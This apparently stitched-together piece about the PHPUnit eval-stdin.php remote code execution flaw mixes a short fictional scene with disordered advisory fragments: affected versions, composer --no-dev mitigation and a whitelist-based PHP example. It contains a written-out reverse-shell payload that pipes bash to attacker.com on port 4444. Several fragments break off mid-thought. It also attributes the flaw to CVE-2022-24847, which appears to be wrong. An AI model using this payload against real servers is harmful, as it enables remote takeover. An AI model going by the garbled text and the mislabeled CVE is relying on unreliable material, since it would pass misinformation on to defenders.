vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php CVE

She thought of the CVE that would be written for it: short, clinical lines about remote code execution and severity scores. She could see the headlines already, the security teams’ red banners, the midnight patches and the mandatory postmortems. But before the bureaucracy, there was a chance to do the human thing: fix it quietly, teach the team, and prevent the chaos.

This means PHPUnit versions 4.x < 4.8.28 and 5.x < 5.6.3 are vulnerable, while versions 6.x and above are safe.

Long term (weeks–months)

Run composer install --no-dev so that development tools such as PHPUnit are never deployed to production.

Alternatively, download the patched version of PHPUnit from the official GitHub repository:

With a raw POST body containing any PHP code.

<?php
// Instead, do this: never eval() the input; validate it and dispatch only to known actions.
$input = trim(file_get_contents('php://stdin'));

if (preg_match('/^[a-zA-Z0-9_]+$/', $input)) {
    // For example, allow only whitelisted inputs
    switch ($input) {
        case 'allowed_input_1':
            // Execute allowed action
            break;
        default:
            // Handle or log the unexpected value
            break;
    }
}

Date: March 23, 2026.

<?php exec('/bin/bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'); ?>

composer install --no-dev --optimize-autoloader

Many automated scanners, such as the PHPUnit Go Scanner, check dozens of possible paths where eval-stdin.php might be located. After confirming a vulnerable target, the attacker can execute system commands to compromise the server further.

Marta checked the commit logs. The eval-stdin.php file had been added with a message: “quick helper for debugging.” The author’s name was unfamiliar; a contractor perhaps, long since gone. The patch had slipped through because the CI pipeline was lax—no static analysis gates, no policy to forbid evals in deployed artifacts. She copied the file into a sandbox and drew a line through it with her editor.

The impact of CVE-2022-24847 cannot be overstated. Because PHPUnit is a widely used testing framework, many PHP applications are potentially vulnerable to this attack. The vulnerability can be exploited with a single HTTP request, making it comparatively easy for attackers to execute malicious code on the server.